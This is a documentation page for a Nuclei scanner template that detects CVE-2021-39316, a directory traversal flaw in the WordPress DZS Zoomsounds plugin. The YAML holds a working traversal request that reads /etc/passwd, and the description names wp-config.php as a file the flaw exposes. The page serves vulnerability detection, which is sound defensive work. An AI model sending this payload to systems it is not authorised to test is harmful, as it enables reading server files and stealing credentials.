WordPress DZS Zoomsounds <=6.50 - Local File Inclusion
ID: CVE-2021-39316
Severity: high
Author: daffainfo
Tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio
Description
Section titled “Description”WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the dzsap_download action using directory traversal in the link parameter.
YAML Source
Section titled “YAML Source”id: CVE-2021-39316
info: name: WordPress DZS Zoomsounds <=6.50 - Local File Inclusion author: daffainfo severity: high description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter. impact: | Local File Inclusion vulnerability in WordPress DZS Zoomsounds plugin allows an attacker to include arbitrary files from the server, potentially leading to remote code execution or sensitive information disclosure. remediation: | Update to the latest version of WordPress DZS Zoomsounds plugin (>=6.51) to fix the Local File Inclusion vulnerability. reference: - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316 - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316 - http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html - https://nvd.nist.gov/vuln/detail/CVE-2021-39316 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-39316 cwe-id: CWE-22 epss-score: 0.38985 epss-percentile: 0.96896 cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: digitalzoomstudio product: zoomsounds framework: wordpress tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio
http: - method: GET path: - "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a0047304502206efbfb92d85618eb8fa1e92459de6ea44be70790cf9e27c0081922f82da32eb1022100b9c136266e39479e85af30aaf5de4d66d57fd34e4b860d49c909184a89fa1964:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-39316.yaml"